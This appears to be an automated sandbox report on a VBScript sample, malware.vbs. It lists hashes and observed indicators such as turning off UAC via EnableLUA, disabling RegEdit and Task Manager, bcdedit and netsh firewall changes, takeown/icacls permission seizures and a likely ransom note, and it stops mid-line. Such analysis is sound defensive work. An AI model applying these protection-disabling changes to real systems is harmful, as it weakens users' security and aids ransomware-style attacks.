Analysis
-
max time kernel
159s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 15:54
Static task
static1
Behavioral task
behavioral1
Sample
malware.vbs
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
malware.vbs
Resource
win10v2004-20240426-en
General
-
Target
malware.vbs
-
Size
6KB
-
MD5
e0776095121712202c80802058348633
-
SHA1
6915df50e7944d289d789085428fd73ba01c6653
-
SHA256
8d1cee07b1f4153c602c7af67f13391da300cc488e69b59279b1a8d75106d864
-
SHA512
7aaf8b33a91da07a62f9491c50c4637e9f1fee83d76ef3df9dc6843f1448457a93f892a1a1d93566aea2d08e9abcbfa25a943b52984f8669949eb2509d8ce1a6
-
SSDEEP
96:qD2WSNb8mN8r9f4PPfMSHnx2gqoij8RW8E/zmdPzWdEKuWP2W9NukS/Mom2i:qD8qrZgX7yrCdPidfbUG2i
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Modifies boot configuration data using bcdedit 1 TTPs 8 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 5172 bcdedit.exe 5348 bcdedit.exe 5820 bcdedit.exe 4808 bcdedit.exe 5148 bcdedit.exe 5880 bcdedit.exe 5872 bcdedit.exe 1904 bcdedit.exe -
Creates new service(s) 2 TTPs
-
Disables RegEdit via registry modification 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 20 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exepid process 5308 netsh.exe 5444 netsh.exe 3672 netsh.exe 5848 netsh.exe 5624 netsh.exe 5520 netsh.exe 2504 netsh.exe 6016 netsh.exe 4228 netsh.exe 2440 netsh.exe 4728 netsh.exe 3104 netsh.exe 5184 netsh.exe 4932 netsh.exe 2412 netsh.exe 1488 netsh.exe 2720 netsh.exe 4920 netsh.exe 6068 netsh.exe 5136 netsh.exe -
Possible privilege escalation attempt 12 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exepid process 5160 icacls.exe 5336 icacls.exe 2708 takeown.exe 5344 icacls.exe 3328 takeown.exe 2440 icacls.exe 5840 takeown.exe 5804 icacls.exe 4848 takeown.exe 5344 takeown.exe 5444 icacls.exe 5288 takeown.exe -
Modifies file permissions 1 TTPs 12 IoCs
Processes:
takeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid process 5344 takeown.exe 5288 takeown.exe 5336 icacls.exe 3328 takeown.exe 2440 icacls.exe 2708 takeown.exe 5840 takeown.exe 5160 icacls.exe 5444 icacls.exe 5344 icacls.exe 5804 icacls.exe 4848 takeown.exe -
Drops file in System32 directory 25 IoCs
Processes:
OpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db OpenWith.exe -
Drops file in Windows directory 1 IoCs
Processes:
netsh.exedescription ioc process File created C:\Windows\rescache\_merged\431186354\3919016826.pri netsh.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 3912 sc.exe 5672 sc.exe 5232 sc.exe 708 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
msedge.exemsedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exeipconfig.exeipconfig.exepid process 3672 ipconfig.exe 5644 ipconfig.exe 5532 ipconfig.exe 4200 ipconfig.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
netsh.exereg.exereg.exereg.exenetsh.exereg.exereg.exereg.exereg.exereg.execmd.exereg.exeOpenWith.exeOpenWith.execmd.exeOpenWith.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\icsvc.dll,-700 = "Virtual Machine Monitoring" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System reg.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E44E9428-BDBC-4987-A099-40DC8FD255E7} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 0100000000000000c18bc70205aada01 cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f\a01460c8\@{Microsoft.XboxGameCallableUI_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy? = "Xbox Game UI" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\1d5acddee1afafc\a01460c8\@{Microsoft.Windows.Apprep.ChxApp_1000.19041.1023.0_neutral_neutral_cw5n1h2t = "Windows Defender SmartScreen" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d5ace438733a83\a01460c8 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8\@{Microsoft.AccountsControl_10.0.19041.1023_neutral__cw5n1h2txyewy?ms-resource://M = "Email and accounts" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d5acddea4e2414\a01460c8\@{Microsoft.Windows.StartMenuExperienceHost_10.0.19041.1023_neutra = "Start" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d5ace438733a83\a01460c8\@{Microsoft.Windows.SecureAssessmentBrowser_10.0.19041.1023_neutra = "Take a Test" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9003 = "BranchCache - Hosted Cache Client (Uses HTTPS)" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\International reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@sstpsvc.dll,-35001 = "Secure Socket Tunneling Protocol" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri\1d5acddd82645c0\a01460c8 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9000 = "BranchCache - Content Retrieval (Uses HTTP)" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software reg.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e5369a06a26c\a01460c8 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" cmd.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri\1d5acdded540f4d\a01460c8\@{Microsoft.Windows.NarratorQuickStart_10.0.19041.1023_neutral_neutral_ = "Narrator" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri\1d5acddd82645c0\a01460c8\@{Microsoft.Windows.ContentDeliveryManager_10.0.19041.1023_neutral_ = "Microsoft Content" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Search_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Search_cw5n1h2txyewy%5Cresources.pri\1d7e5369da0bc36\a01460c8 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\firewallapi.dll,-37302 = "mDNS" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e53672e17460\a01460c8\@{Microsoft.Windows.PeopleExperienceHost_10.0.19041.1023_neutral_neut = "Windows Shell Experience" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
Notepad.exepid process 2816 Notepad.exe -
Runs .reg file with regedit 1 IoCs
Processes:
regedit.exepid process 5372 regedit.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exeidentity_helper.exepid process 4044 msedge.exe 4044 msedge.exe 4988 msedge.exe 4988 msedge.exe 5492 identity_helper.exe 5492 identity_helper.exe 2396 msedge.exe 2396 msedge.exe 5964 msedge.exe 5964 msedge.exe 4468 identity_helper.exe 4468 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
Processes:
msedge.exemsedge.exepid process 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exetakeown.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exedescription pid process Token: SeShutdownPrivilege 4520 powercfg.exe Token: SeCreatePagefilePrivilege 4520 powercfg.exe Token: SeShutdownPrivilege 3456 powercfg.exe Token: SeCreatePagefilePrivilege 3456 powercfg.exe Token: SeShutdownPrivilege 2148 powercfg.exe Token: SeCreatePagefilePrivilege 2148 powercfg.exe Token: SeShutdownPrivilege 4932 powercfg.exe Token: SeCreatePagefilePrivilege 4932 powercfg.exe Token: SeDebugPrivilege 4956 whoami.exe Token: SeTakeOwnershipPrivilege 5344 takeown.exe Token: SeShutdownPrivilege 5648 powercfg.exe Token: SeCreatePagefilePrivilege 5648 powercfg.exe Token: SeShutdownPrivilege 5684 powercfg.exe Token: SeCreatePagefilePrivilege 5684 powercfg.exe Token: SeShutdownPrivilege 444 powercfg.exe Token: SeCreatePagefilePrivilege 444 powercfg.exe Token: SeShutdownPrivilege 6028 powercfg.exe Token: SeCreatePagefilePrivilege 6028 powercfg.exe Token: SeDebugPrivilege 5952 whoami.exe Token: SeTakeOwnershipPrivilege 5288 takeown.exe Token: SeTakeOwnershipPrivilege 3328 takeown.exe Token: SeTakeOwnershipPrivilege 2708 takeown.exe Token: SeShutdownPrivilege 4968 powercfg.exe Token: SeCreatePagefilePrivilege 4968 powercfg.exe Token: SeShutdownPrivilege 3960 powercfg.exe Token: SeCreatePagefilePrivilege 3960 powercfg.exe Token: SeShutdownPrivilege 6108 powercfg.exe Token: SeCreatePagefilePrivilege 6108 powercfg.exe Token: SeShutdownPrivilege 884 powercfg.exe Token: SeCreatePagefilePrivilege 884 powercfg.exe Token: SeDebugPrivilege 5868 whoami.exe Token: SeTakeOwnershipPrivilege 5840 takeown.exe Token: SeShutdownPrivilege 5660 powercfg.exe Token: SeCreatePagefilePrivilege 5660 powercfg.exe Token: SeShutdownPrivilege 4796 powercfg.exe Token: SeCreatePagefilePrivilege 4796 powercfg.exe Token: SeShutdownPrivilege 4556 powercfg.exe Token: SeCreatePagefilePrivilege 4556 powercfg.exe Token: SeShutdownPrivilege 764 powercfg.exe Token: SeCreatePagefilePrivilege 764 powercfg.exe Token: SeDebugPrivilege 3652 whoami.exe Token: SeTakeOwnershipPrivilege 4848 takeown.exe -
Suspicious use of FindShellTrayWindow 52 IoCs
Processes:
msedge.exemsedge.exepid process 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe -
Suspicious use of SendNotifyMessage 48 IoCs
Processes:
msedge.exemsedge.exepid process 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 4988 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe 5964 msedge.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
OpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exepid process 5936 OpenWith.exe 5732 OpenWith.exe 4192 OpenWith.exe 5844 OpenWith.exe 2336 OpenWith.exe 2444 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exedescription pid process target process PID 4796 wrote to memory of 2000 4796 cmd.exe net.exe PID 4796 wrote to memory of 2000 4796 cmd.exe net.exe PID 2000 wrote to memory of 4580 2000 net.exe net1.exe PID 2000 wrote to memory of 4580 2000 net.exe net1.exe PID 4796 wrote to memory of 4520 4796 cmd.exe powercfg.exe PID 4796 wrote to memory of 4520 4796 cmd.exe powercfg.exe PID 4796 wrote to memory of 3456 4796 cmd.exe powercfg.exe PID 4796 wrote to memory of 3456 4796 cmd.exe powercfg.exe PID 4796 wrote to memory of 2148 4796 cmd.exe powercfg.exe PID 4796 wrote to memory of 2148 4796 cmd.exe powercfg.exe PID 4796 wrote to memory of 4932 4796 cmd.exe powercfg.exe PID 4796 wrote to memory of 4932 4796 cmd.exe powercfg.exe PID 4796 wrote to memory of 2504 4796 cmd.exe netsh.exe PID 4796 wrote to memory of 2504 4796 cmd.exe netsh.exe PID 4796 wrote to memory of 1488 4796 cmd.exe netsh.exe PID 4796 wrote to memory of 1488 4796 cmd.exe netsh.exe PID 4796 wrote to memory of 4228 4796 cmd.exe netsh.exe PID 4796 wrote to memory of 4228 4796 cmd.exe netsh.exe PID 4796 wrote to memory of 2720 4796 cmd.exe netsh.exe PID 4796 wrote to memory of 2720 4796 cmd.exe netsh.exe PID 4796 wrote to memory of 4728 4796 cmd.exe netsh.exe PID 4796 wrote to memory of 4728 4796 cmd.exe netsh.exe PID 4796 wrote to memory of 1620 4796 cmd.exe reg.exe PID 4796 wrote to memory of 1620 4796 cmd.exe reg.exe PID 4796 wrote to memory of 5100 4796 cmd.exe reg.exe PID 4796 wrote to memory of 5100 4796 cmd.exe reg.exe PID 4796 wrote to memory of 708 4796 cmd.exe reg.exe PID 4796 wrote to memory of 708 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2644 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2644 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2096 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2096 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2396 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2396 4796 cmd.exe reg.exe PID 4796 wrote to memory of 1588 4796 cmd.exe reg.exe PID 4796 wrote to memory of 1588 4796 cmd.exe reg.exe PID 4796 wrote to memory of 4396 4796 cmd.exe reg.exe PID 4796 wrote to memory of 4396 4796 cmd.exe reg.exe PID 4796 wrote to memory of 3832 4796 cmd.exe reg.exe PID 4796 wrote to memory of 3832 4796 cmd.exe reg.exe PID 4796 wrote to memory of 4452 4796 cmd.exe reg.exe PID 4796 wrote to memory of 4452 4796 cmd.exe reg.exe PID 4796 wrote to memory of 3520 4796 cmd.exe reg.exe PID 4796 wrote to memory of 3520 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2440 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2440 4796 cmd.exe reg.exe PID 4796 wrote to memory of 3216 4796 cmd.exe reg.exe PID 4796 wrote to memory of 3216 4796 cmd.exe reg.exe PID 4796 wrote to memory of 1260 4796 cmd.exe reg.exe PID 4796 wrote to memory of 1260 4796 cmd.exe reg.exe PID 4796 wrote to memory of 4400 4796 cmd.exe reg.exe PID 4796 wrote to memory of 4400 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2476 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2476 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2344 4796 cmd.exe reg.exe PID 4796 wrote to memory of 2344 4796 cmd.exe reg.exe PID 4796 wrote to memory of 1652 4796 